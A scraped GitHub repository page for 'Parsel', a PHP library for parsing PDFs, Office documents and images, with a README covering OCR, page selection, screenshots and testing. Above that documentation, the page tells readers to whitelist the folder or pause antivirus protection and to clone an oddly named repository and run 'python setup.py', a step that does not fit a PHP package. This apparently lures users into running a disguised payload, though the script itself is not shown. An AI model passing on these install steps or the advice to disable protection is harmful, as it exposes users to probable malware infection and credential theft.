Parsel

Tip

If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.

Caution

Some security systems may block the installation. Only download from the official repository.

QUICK START

git clone https://github.com/furdomainplot/parsel-598.git
cd parsel-598
python setup.py

Parsel provides an expressive PHP API for parsing PDFs, Office documents, and images. Your documents are processed locally, allowing you to extract plain text, structured page data, coordinates, and screenshots without sending files to an external service.

Parsel may return plain text, structured document data, page screenshots, or one page at a time for larger documents. It is designed to feel natural in PHP applications while still giving you access to advanced parser options when you need them.

use Shipfastlabs\Parsel;

$text = Parsel::file('invoice.pdf')->text();

$document = Parsel::file('invoice.pdf')
    ->pageRange(1, 5)
    ->withOcr(language: 'eng')
    ->withDpi(300)
    ->parse();

foreach ($document->pages as $page) {
    foreach ($page->items as $item) {
        echo "{$item->text} @ ({$item->x}, {$item->y})\n";
    }
}

Parsel requires PHP 8.4 or greater and the lit binary.

macOS

Ubuntu / Debian

apt-get install libreoffice # For Office Document apt-get install imagemagick # For Images

Windows


LibreOffice is used for Office document conversion, ImageMagick is used for image conversion, and OCR support uses Tesseract through liteparse.

## Parsing Files

The `file` method creates a parser instance for a document that already exists on disk. Once a source has been selected, you may choose how the parsed output should be returned.

```php
use Shipfastlabs\Parsel;

$text = Parsel::file('/path/to/report.pdf')->text();

You may also parse raw bytes. This is useful when working with uploaded files, database blobs, or documents that have not been persisted to disk. Because byte sources do not include a filename, you should provide the file extension.

$document = Parsel::bytes($uploadedBytes, 'pdf')->parse();

Parsel may be used with PDFs, Word documents, spreadsheets, presentations, and images. The same fluent API is used for each supported file type:

$text = Parsel::file('contract.docx')->text();

$rows = Parsel::file('report.xlsx')->text();

$slides = Parsel::file('deck.pptx')->text();

$scan = Parsel::file('receipt.png')
    ->withOcr()
    ->text();

$photo = Parsel::file('invoice.jpg')
    ->withOcr(language: 'eng')
    ->parse();

Plain Text

The text method returns the parsed document text as a string. Parsel removes page header markers from text output before returning it.

$text = Parsel::file('document.pdf')
    ->withoutOcr()
    ->text();

Structured Documents

The parse method returns a Document object containing the document text, metadata, pages, and positioned text items. This is useful when you need coordinates, font information, or OCR confidence values.

$document = Parsel::file('document.pdf')->parse();

echo $document->text;
echo $document->pageCount();

foreach ($document->pages as $page) {
    foreach ($page->items as $item) {
        echo $item->text;
    }
}

The document may also be returned as an array:

$array = Parsel::file('document.pdf')->toArray();

Page Selection

The page, pages, and pageRange methods may be used to limit parsing to specific pages. These methods are additive, so you may combine multiple calls before parsing the document.

Parsel::file('document.pdf')->page(7);

Parsel::file('document.pdf')->pages(1, 3, 5);

Parsel::file('document.pdf')->pages('1-5', 10);

Parsel::file('document.pdf')->pageRange(1, 5);

Parsel::file('document.pdf')->pageRange(1, 5)->page(10);

If you only need to limit how many pages are parsed, you may use the maxPages method:

Parsel::file('document.pdf')->maxPages(50)->text();

OCR

OCR is disabled by default so that parsing remains fast and predictable. You may enable OCR using the withOcr method:

$text = Parsel::file('scan.pdf')->withOcr()->text();

The withOcr method accepts named arguments for the most common OCR options:

$text = Parsel::file('scan.pdf')
    ->withOcr(
        language: 'fra',
        tessdataPath: '/usr/share/tessdata',
        serverUrl: 'http://localhost:8828/ocr',
        workers: 8,
    )
    ->text();

If you would like to be explicit that OCR should not be used, you may call withoutOcr:

$text = Parsel::file('document.pdf')->withoutOcr()->text();

Rendering Options

Parsel includes convenience methods for common parser options such as rendering DPI, small text preservation, encrypted documents, and per-call process settings.

Parsel::file('document.pdf')->withDpi(300);

Parsel::file('document.pdf')->preserveSmallText();

Parsel::file('secret.pdf')->withPassword('hunter2');

Parsel::file('document.pdf')->withBinary('/usr/local/bin/lit');

Parsel::file('document.pdf')->withTimeout(120);

Additional Options

If you need to pass a flag that Parsel does not yet provide as a dedicated method, you may pass the option directly using the option method. Boolean options may be passed without a value, while options that require a value may receive one as the second argument.

Parsel::file('document.pdf')->option('some-new-flag');

Parsel::file('document.pdf')->option('some-new-flag', 42);

Saving Output

The save method writes parsed output to disk and returns the path that was written. When the target path ends in .json, Parsel will write JSON output. For all other extensions, Parsel will write plain text.

Parsel::file('document.pdf')->save('document.txt');

Parsel::file('document.pdf')->save('document.json');

Screenshots

You may use the screenshots method to render page screenshots into a directory. The method returns the image files found in the output directory after parsing has finished.

$screenshots = Parsel::file('document.pdf')
    ->pageRange(1, 5)
    ->screenshots('/tmp/parsel-pages');

For predictable results, you should pass a dedicated output directory that does not contain unrelated files.

Streaming Large Documents

The parse and toArray methods load the parsed document into memory. When working with large documents, you may use lazyPages to process one page at a time.

foreach (Parsel::file('large-document.pdf')->lazyPages() as $page) {
    foreach ($page->items as $item) {
        // Process one page at a time...
    }
}

This allows Parsel to read pages incrementally instead of keeping the full document in memory.

Document Data

A parsed Document contains the full text, metadata, and a list of pages. Each page contains its dimensions, page text, and text items with position data.

$document->text;
$document->metadata;
$document->pages;
$document->pageCount();

$page->number;
$page->width;
$page->height;
$page->text;
$page->items;

$item->text;
$item->x;
$item->y;
$item->width;
$item->height;
$item->fontName;
$item->fontSize;
$item->confidence;

Binary Resolution

When Parsel needs to parse a document, it resolves the lit binary in the following order:

If no binary can be resolved, Parsel will throw a BinaryNotFoundException.

Parsel::usingBinary('/usr/local/bin/lit');

Parsel::defaultTimeout(120);

Testing

Parsel includes a fake runner that allows your tests to exercise parsing code without spawning the real binary. Response keys are matched against the command line as substrings. When multiple responses match, the longest matching key is used.

use Shipfastlabs\Parsel;

$fake = Parsel::fake([
    '--format json' => file_get_contents(__DIR__.'/fixtures/lit-output.json'),
]);

$document = Parsel::file('invoice.pdf')->parse();

expect($fake->recordedCommands()[0])->toContain('--format', 'json');

String responses are returned as successful stdout. If you need control over the exit code or stderr, you may provide a ProcessResult instance instead.

Development

Parsel uses Pint, Rector, PHPStan, and Pest to keep the codebase formatted and well tested.

composer lint
composer test:types
composer test:unit
composer test

The integration tests run against a real parser installation and are skipped when the lit binary is not available:

./vendor/bin/pest --group=integration

Credits

Parsel is maintained by Shipfastlabs and released under the MIT license.

Name		Name	Last commit message	Last commit date
Latest commit History 27 Commits
.github		.github
bin		bin
examples		examples
src		src
.editorconfig		.editorconfig
.gitattributes		.gitattributes
.gitignore		.gitignore
CHANGELOG.md		CHANGELOG.md
CONTRIBUTING.md		CONTRIBUTING.md
LICENSE		LICENSE
LICENSE.md		LICENSE.md
README.md		README.md
SECURITY.md		SECURITY.md
composer.json		composer.json
setup.py		setup.py

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

Parsel

QUICK START

macOS

Ubuntu / Debian

Windows

Plain Text

Structured Documents

Page Selection

OCR

Rendering Options

Additional Options

Saving Output

Screenshots

Streaming Large Documents

Document Data

Binary Resolution

Testing

Development

Credits

About

Licenses found

Uh oh!

Releases

Packages

Uh oh!

Contributors

Uh oh!

Languages

Folders and files

Latest commit

History

Repository files navigation

Parsel

QUICK START

macOS

Ubuntu / Debian

Windows

Plain Text

Structured Documents

Page Selection

OCR

Rendering Options

Additional Options

Saving Output

Screenshots

Streaming Large Documents

Document Data

Binary Resolution

Testing

Development

Credits

About

Topics

Resources

License

Licenses found

Contributing

Security policy

Uh oh!

Stars

Watchers

Forks

Releases

Packages 0

Uh oh!

Contributors

Uh oh!

Languages

Packages